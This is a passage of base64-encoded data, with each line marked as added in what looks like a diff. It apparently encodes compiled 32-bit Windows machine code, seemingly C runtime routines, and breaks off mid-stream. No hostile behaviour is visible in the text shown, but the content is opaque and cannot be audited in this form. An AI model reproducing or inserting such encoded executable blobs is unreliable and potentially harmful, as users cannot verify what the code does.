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 